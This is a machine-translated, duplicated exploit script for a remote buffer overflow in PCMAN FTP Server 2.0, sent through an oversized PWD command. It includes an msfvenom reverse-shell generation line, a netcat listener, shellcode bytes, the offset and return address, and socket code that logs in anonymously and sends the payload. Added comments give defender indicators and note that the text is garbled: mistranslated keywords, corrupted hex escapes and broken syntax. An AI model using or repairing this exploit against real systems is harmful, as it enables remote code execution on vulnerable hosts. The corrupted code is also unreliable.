#利用标题: PCMAN FTP服务器2.0-'PWD'远程缓冲区溢出
#日期: 09/25/2023
#利用作者: Waqas Ahmed Faroouqi(Zeroxinn)
#供应商homepage: http://pcman.openfoundry.org/
#软件link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-pcman.7z
#版本: 2.0
#在: Windows XP SP3上测试
#!/usr/bin/python
导入套接字
#buffer='a' * 2500
#offset=2007
#Badchars=\ x00 \ x0a \ x0d
#return_address=0x7e429353(user32.dll)
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.130 lport=4444 exitfunc=thread -f c -b c -b'\ x00 \ x0a \ x0a \ x0d'
#NC -NVLP 4444
# Tuple of adjacent string literals holding the reverse-shell payload that the
# header's msfvenom line produces (Windows shell_reverse_tcp with the bad chars
# \x00 \x0a \x0d excluded). The identifier is a machine translation of the
# original name ("overflow"): the whole listing has been run through a
# translator, so keywords and names are not valid Python as shown.
# As extracted, the byte literals are also corrupted (spaces inside the \x
# escapes, repeated bytes, stray quotes, an unbalanced "((") and cannot be
# assembled into the original payload from this page; the listing only
# documents the layout of the attack, it does not run.
# Defender note: per the header, the payload is delivered inside a single FTP
# "PWD" command line. RFC 959 defines PWD without an argument, so a PWD line
# carrying kilobytes of data is a reliable IDS / FTP-log indicator for this
# class of attack.
溢出=((
'\ xdb \ xce \ xd9 \ x74 \ x24 \ xf4 \ xf4 \ xba \ xc1 \ x93 \ x93 \ x3a \ xcc \ xcc \ x58 \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x50 \ x17 \ x17 \ x03 \ x50 \ x17 \ x83 \ x83 \ x01 \ x97 \ x97 \ xd8 \ x39 \ x39 \ x7d'\ x7d'
'\ x70 \ x9e \ xc2 \ x7d \ x81 \ xff \ x4b \ x98 \ xb0 \ xb0 \ x3f \ x2f \ x2f \ xe9 \ xe9 \ xe3 \ xe3 \ x8f'
'\ x3b \ xbf \ x0f \ x7b \ x69 \ x2b \ x9b \ x9b \ x09 \ xa6 \ x5c \ x5c \ x2c \ x2c \ xa7 \ x90 \ x90 \ x53'
'\ xad \ x94 \ xe1 \ xf2 \ x2d \ xe7 \ x35 \ xd4 \ xd4 \ x0c \ x28 \ x48 \ x48 \ x15 \ x15 \ x48 \ x55'\ x55'
'\ xa1 \ x47 \ x01 \ x11 \ x14 \ x77 \ x26 \ x6f \ x6f \ xa5 \ xfc \ xfc \ x74 \ x61 \ x61 \ xad \ xe1''
'\ xcd \ x80 \ x9c \ xb4 \ x46 \ xdb \ x3e \ x37 \ x37 \ x8a \ x57 \ x57 \ x77 \ x77 \ x2f \ xcf \ xcf \ x52'
'\ xc1 \ xc4 \ x3b \ x28 \ xd0 \ x0c \ x72 \ xd1 \ xd1 \ x7f \ x71 \ x71 \ xba \ xba \ x20 \ x20 \ x81 \ xb6'
'\ x7d \ xdb \ xf4 \ xce \ x7d \ x66 \ x0f \ x15 \ xff \ xff \ xbc \ x9a \ x9a \ x8d \ x8d \ xa7 \ x37'\ x37''
'\ x3c \ x69 \ x59 \ x9b \ xdb \ xfa \ x55 \ x55 \ x50 \ xaf \ xa4 \ x79 \ x67 \ x67 \ x7c \ x7c \ xdf'
'\ x86 \ xec \ x83 \ x0f \ x0f \ xb6 \ xa7 \ x8b \ x8b \ x4b \ x4b \ x6c \ xc9 \ x8a \ x8a \ x31 \ x31 \ xc3'
'\ xf6 \ xcc \ x99 \ xbc \ x52 \ x87 \ x34 \ x34 \ xa8 \ xee \ xca \ xca \ x50 \ x10 \ x1d \ xc3 \ xf4''
'\ xa0 \ x09 \ x54 \ x87 \ x92 \ x96 \ xce \ x0f \ x0f \ x9f \ x9f \ x5f \ x5f \ xc9 \ xc8 \ xc8 \ xe0 \ x75 \ x75'\ x75'
'\ xad \ x46 \ x1f \ x76 \ xce \ x4f \ xe4 \ x22 \ x9e \ x9e \ xe7 \ xcd \ xcd \ x4a \ x75 \ x75 \ xf7'''
'\ xf2 \ x9e \ xda \ xa7 \ x5c \ x71 \ x9b \ x9b \ x17 \ x1d \ x1d \ x21 \ x73 \ x73 \ x7d \ x92 \ x92 \ x1e''
'\ x63 \ x7e \ x78 \ x37 \ x0e \ x85 \ xeb \ xf8 \ xf8 \ x67 \ x17 \ x17 \ x6d \ x6d \ x90 \ x75 \ x75 \ x17'''
'\ x63 \ x3d \ xf3 \ xf1 \ xe9 \ xad \ x55 \ xaa \ x85 \ x85 \ x54 \ x54 \ xfc \ x20 \ x20 \ x37 \ x98'''
'\ x2a \ x4d \ x77 \ x12 \ xd9 \ xb2 \ x36 \ xd3 \ xd3 \ x94 \ xa0 \ xaf \ xaf \ x13 \ x13 \ xe3 \ x9a'''
'\ x66 \ x2b \ xd9 \ xb2 \ xe5 \ xbe \ x86 \ x42 \ x42 \ x63 \ xa3 \ xa3 \ x10 \ x10 \ x15 \ x15 \ x24 \ x15'\ x15'
'\ x69 \ xf3 \ xd8 \ x0c \ xc3 \ xe1 \ x20 \ xc8 \ xc8 \ x2c \ xa1 \ xfe \ xfe \ x29 \ xb2 \ xb2 \ x28''
'\ x72 \ x15 \ x90 \ x3a \ x4a \ x4a \ x96 \ x9c \ x6e \ x6e \ x02 \ xc1 \ xc1 \ x4a \ xd8 \ xd8 \ xe4 \ xbb'\ xbb'
'\ x3c \ xb2 \ xbe \ x10 \ x97 \ x52 \ x46 \ x5b \ x5b \ x28 \ x24 \ x24 \ x47 \ xb6 \ xb6 \ xde \ xc8''
'\ xf6 \ x6f \ xa7 \ xf7 \ x37 \ xf8 \ xf8 \ x2f \ x80 \ x25 \ x98 \ x98 \ xd0 \ xd0 \ x5b \ xee \ xb8'\ xb8''
'\ x32 \ x49 \ x1b \ x51 \ xeb \ x18 \ xa6 \ x3c \ x3c \ x0c \ xf7 \ xe5 \ xe5 \ x38 \ x38 \ x8f \ xfd \ xfd'
'\ x95 \ xbe \ x8f \ x74 \ x93 \ xfb \ x17 \ x65 \ x65 \ xe9 \ x94 \ x94 \ xfd \ x89 \ x5e \ x5e \ x94'''
'\ xd7')
# Overflow string, laid out as filler + saved-return-address overwrite + NOP
# sled + payload:
#   'a' * 2007            - filler up to the return address (header: offset=2007)
#   '\x53\x93\x42\x7e'    - 0x7e429353 from user32.dll (header), little-endian;
#                           presumably a jump into the sled that follows - the
#                           page does not say which instruction it is
#   '\x90' * 32           - NOP sled
#   溢出                  - the payload tuple above
# The line as extracted carries an extra "+' +'" fragment and spaces inside the
# escapes, so it would not parse as written.
# Defender note: the fixed user32.dll address is what ties this to one exact
# build (header: tested on Windows XP SP3, which has no ASLR). On a host with
# ASLR the same oversized PWD would likely still crash the service, so the
# denial-of-service risk remains even where code execution fails. This page
# references no vendor fix; mitigation is retiring or isolating the service.
shellCode='a' * 2007 +'\ x53 \ x93 \ x42 \ x7e' +' +'\ x90' * 32 +溢出
# Change the target IP/port as needed (translated from the original comment).
# Python 2 script: print is used as a statement and the payload is a str, so
# it would not run on Python 3 even with the translation damage undone. The
# socket constants appear lower-cased by extraction (the real API names are
# socket.AF_INET and socket.SOCK_STREAM); S/s and Connect/connect likewise.
s=socket.socket(socket.af_inet,socket.sock_stream)
TRY:
打印'\ nsending Evil Buffer .'
# Connects to the FTP control port (21) of the lab host from the header.
S.Connect(('192.168.146.135',21))
# Reads the banner, then logs in as anonymous; the two literals below are
# machine translations of "USER anonymous" / "PASS anonymous" and are runtime
# strings, so they are left untouched here.
# Defender note: the PoC authenticates before sending the overflow. Whether the
# server requires that is not shown on this page, but if it does, disabling
# anonymous FTP closes the unauthenticated path to this bug.
数据=s.recv(1024)
S.Send('用户匿名' +'\ r \ n')
数据=s.recv(1024)
S.Send('通过匿名\ r \ n')
# The overflow itself: the >2000-byte buffer is sent as the argument of PWD.
S.Send('PWD' + shellCode +'\ r \ n')
s.close()
# The success message is printed as soon as the send completes; it does not
# confirm that the overflow or the reverse shell worked.
打印'\ nexploit成功完成!
# Bare except: every failure (refused connection, reset, timeout, send error)
# is reported under the single "could not connect to FTP" message.
Except:
打印“无法连接到FTP!”
#日期: 09/25/2023
#利用作者: Waqas Ahmed Faroouqi(Zeroxinn)
#供应商homepage: http://pcman.openfoundry.org/
#软件link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-pcman.7z
#版本: 2.0
#在: Windows XP SP3上测试
#!/usr/bin/python
导入套接字
#buffer='a' * 2500
#offset=2007
#Badchars=\ x00 \ x0a \ x0d
#return_address=0x7e429353(user32.dll)
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.130 lport=4444 exitfunc=thread -f c -b c -b'\ x00 \ x0a \ x0a \ x0d'
#NC -NVLP 4444
# Second copy of the same listing (the page repeats it from the date line on).
# Tuple of adjacent string literals holding the msfvenom reverse-shell payload
# from the header; the identifier is a machine translation of "overflow".
# As extracted the byte literals are corrupted (spaces inside the \x escapes,
# repeated bytes, stray quotes, an unbalanced "((") and cannot be assembled
# into the original payload from this page.
# Defender note: the payload travels inside one FTP "PWD" command line, which
# RFC 959 defines as taking no argument - an oversized PWD line is a reliable
# log/IDS indicator for this attack class.
溢出=((
'\ xdb \ xce \ xd9 \ x74 \ x24 \ xf4 \ xf4 \ xba \ xc1 \ x93 \ x93 \ x3a \ xcc \ xcc \ x58 \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x50 \ x17 \ x17 \ x03 \ x50 \ x17 \ x83 \ x83 \ x01 \ x97 \ x97 \ xd8 \ x39 \ x39 \ x7d'\ x7d'
'\ x70 \ x9e \ xc2 \ x7d \ x81 \ xff \ x4b \ x98 \ xb0 \ xb0 \ x3f \ x2f \ x2f \ xe9 \ xe9 \ xe3 \ xe3 \ x8f'
'\ x3b \ xbf \ x0f \ x7b \ x69 \ x2b \ x9b \ x9b \ x09 \ xa6 \ x5c \ x5c \ x2c \ x2c \ xa7 \ x90 \ x90 \ x53'
'\ xad \ x94 \ xe1 \ xf2 \ x2d \ xe7 \ x35 \ xd4 \ xd4 \ x0c \ x28 \ x48 \ x48 \ x15 \ x15 \ x48 \ x55'\ x55'
'\ xa1 \ x47 \ x01 \ x11 \ x14 \ x77 \ x26 \ x6f \ x6f \ xa5 \ xfc \ xfc \ x74 \ x61 \ x61 \ xad \ xe1''
'\ xcd \ x80 \ x9c \ xb4 \ x46 \ xdb \ x3e \ x37 \ x37 \ x8a \ x57 \ x57 \ x77 \ x77 \ x2f \ xcf \ xcf \ x52'
'\ xc1 \ xc4 \ x3b \ x28 \ xd0 \ x0c \ x72 \ xd1 \ xd1 \ x7f \ x71 \ x71 \ xba \ xba \ x20 \ x20 \ x81 \ xb6'
'\ x7d \ xdb \ xf4 \ xce \ x7d \ x66 \ x0f \ x15 \ xff \ xff \ xbc \ x9a \ x9a \ x8d \ x8d \ xa7 \ x37'\ x37''
'\ x3c \ x69 \ x59 \ x9b \ xdb \ xfa \ x55 \ x55 \ x50 \ xaf \ xa4 \ x79 \ x67 \ x67 \ x7c \ x7c \ xdf'
'\ x86 \ xec \ x83 \ x0f \ x0f \ xb6 \ xa7 \ x8b \ x8b \ x4b \ x4b \ x6c \ xc9 \ x8a \ x8a \ x31 \ x31 \ xc3'
'\ xf6 \ xcc \ x99 \ xbc \ x52 \ x87 \ x34 \ x34 \ xa8 \ xee \ xca \ xca \ x50 \ x10 \ x1d \ xc3 \ xf4''
'\ xa0 \ x09 \ x54 \ x87 \ x92 \ x96 \ xce \ x0f \ x0f \ x9f \ x9f \ x5f \ x5f \ xc9 \ xc8 \ xc8 \ xe0 \ x75 \ x75'\ x75'
'\ xad \ x46 \ x1f \ x76 \ xce \ x4f \ xe4 \ x22 \ x9e \ x9e \ xe7 \ xcd \ xcd \ x4a \ x75 \ x75 \ xf7'''
'\ xf2 \ x9e \ xda \ xa7 \ x5c \ x71 \ x9b \ x9b \ x17 \ x1d \ x1d \ x21 \ x73 \ x73 \ x7d \ x92 \ x92 \ x1e''
'\ x63 \ x7e \ x78 \ x37 \ x0e \ x85 \ xeb \ xf8 \ xf8 \ x67 \ x17 \ x17 \ x6d \ x6d \ x90 \ x75 \ x75 \ x17'''
'\ x63 \ x3d \ xf3 \ xf1 \ xe9 \ xad \ x55 \ xaa \ x85 \ x85 \ x54 \ x54 \ xfc \ x20 \ x20 \ x37 \ x98'''
'\ x2a \ x4d \ x77 \ x12 \ xd9 \ xb2 \ x36 \ xd3 \ xd3 \ x94 \ xa0 \ xaf \ xaf \ x13 \ x13 \ xe3 \ x9a'''
'\ x66 \ x2b \ xd9 \ xb2 \ xe5 \ xbe \ x86 \ x42 \ x42 \ x63 \ xa3 \ xa3 \ x10 \ x10 \ x15 \ x15 \ x24 \ x15'\ x15'
'\ x69 \ xf3 \ xd8 \ x0c \ xc3 \ xe1 \ x20 \ xc8 \ xc8 \ x2c \ xa1 \ xfe \ xfe \ x29 \ xb2 \ xb2 \ x28''
'\ x72 \ x15 \ x90 \ x3a \ x4a \ x4a \ x96 \ x9c \ x6e \ x6e \ x02 \ xc1 \ xc1 \ x4a \ xd8 \ xd8 \ xe4 \ xbb'\ xbb'
'\ x3c \ xb2 \ xbe \ x10 \ x97 \ x52 \ x46 \ x5b \ x5b \ x28 \ x24 \ x24 \ x47 \ xb6 \ xb6 \ xde \ xc8''
'\ xf6 \ x6f \ xa7 \ xf7 \ x37 \ xf8 \ xf8 \ x2f \ x80 \ x25 \ x98 \ x98 \ xd0 \ xd0 \ x5b \ xee \ xb8'\ xb8''
'\ x32 \ x49 \ x1b \ x51 \ xeb \ x18 \ xa6 \ x3c \ x3c \ x0c \ xf7 \ xe5 \ xe5 \ x38 \ x38 \ x8f \ xfd \ xfd'
'\ x95 \ xbe \ x8f \ x74 \ x93 \ xfb \ x17 \ x65 \ x65 \ xe9 \ x94 \ x94 \ xfd \ x89 \ x5e \ x5e \ x94'''
'\ xd7')
# Overflow string (duplicate copy): 2007 bytes of filler to the saved return
# address (header: offset=2007), then 0x7e429353 from user32.dll (header)
# little-endian, a 32-byte NOP sled, and the payload tuple above. The extra
# "+' +'" fragment and the spaces inside the escapes are extraction damage.
# Defender note: the hard-coded user32.dll address pins this to the exact
# XP SP3 build named in the header; elsewhere the oversized PWD would likely
# still crash the service, so treat it as a DoS risk at minimum.
shellCode='a' * 2007 +'\ x53 \ x93 \ x42 \ x7e' +' +'\ x90' * 32 +溢出
# Change the target IP/port as needed (translated from the original comment).
# Duplicate copy of the connection logic: Python 2 syntax (print statement,
# str payload); socket constants and method names are case-mangled by
# extraction (socket.AF_INET / socket.SOCK_STREAM, s.connect / s.send).
s=socket.socket(socket.af_inet,socket.sock_stream)
TRY:
打印'\ nsending Evil Buffer .'
# Connects to the FTP control port of the lab host from the header, reads the
# banner and logs in as anonymous (the next two literals are machine
# translations of "USER anonymous" / "PASS anonymous"; runtime strings, so
# left as extracted). If the server requires a login before PWD, disabling
# anonymous FTP removes the unauthenticated path - not established on this page.
S.Connect(('192.168.146.135',21))
数据=s.recv(1024)
S.Send('用户匿名' +'\ r \ n')
数据=s.recv(1024)
S.Send('通过匿名\ r \ n')
# The overflow: the >2000-byte buffer is sent as the argument of PWD.
S.Send('PWD' + shellCode +'\ r \ n')
s.close()
# Printed as soon as the send completes; it does not confirm the overflow.
打印'\ nexploit成功完成!
# Bare except: every failure mode is collapsed into one "could not connect"
# message.
Except:
打印“无法连接到FTP!”